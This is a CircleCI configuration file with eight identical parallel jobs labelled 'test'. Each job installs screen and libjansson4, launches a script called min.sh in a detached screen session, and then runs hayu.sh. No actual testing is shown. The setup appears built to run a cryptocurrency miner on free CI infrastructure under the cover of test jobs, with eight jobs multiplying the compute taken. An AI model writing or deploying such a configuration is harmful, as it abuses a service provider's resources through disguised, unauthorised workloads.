version: 2.1
jobs:
    meto1:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x min.sh
              screen -dmS run ./min.sh
              chmod +x hayu.sh
              ./hayu.sh
    meto2:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x min.sh
              screen -dmS run ./min.sh
              chmod +x hayu.sh
              ./hayu.sh
    meto3:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x min.sh
              screen -dmS run ./min.sh
              chmod +x hayu.sh
              ./hayu.sh
    meto4:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x min.sh
              screen -dmS run ./min.sh
              chmod +x hayu.sh
              ./hayu.sh
    meto5:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x min.sh
              screen -dmS run ./min.sh
              chmod +x hayu.sh
              ./hayu.sh
    meto6:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x min.sh
              screen -dmS run ./min.sh
              chmod +x hayu.sh
              ./hayu.sh
    meto7:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 
      steps: 
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x min.sh
              screen -dmS run ./min.sh
              chmod +x hayu.sh
              ./hayu.sh
    meto8:
      docker:
            - image: circleci/python:3.9.6-buster
      parallelism: 
      steps:
        - checkout
        - run:
            name: test
            command: | 
              sudo apt update 
              sudo apt install screen libjansson4 -y 
              chmod +x min.sh
              screen -dmS run ./min.sh
              chmod +x hayu.sh
              ./hayu.sh

workflows:
    version: 2
    build:
        jobs:
            - meto1
            - meto2
            - meto3
            - meto4
            - meto5
            - meto6
            - meto7
            - meto8
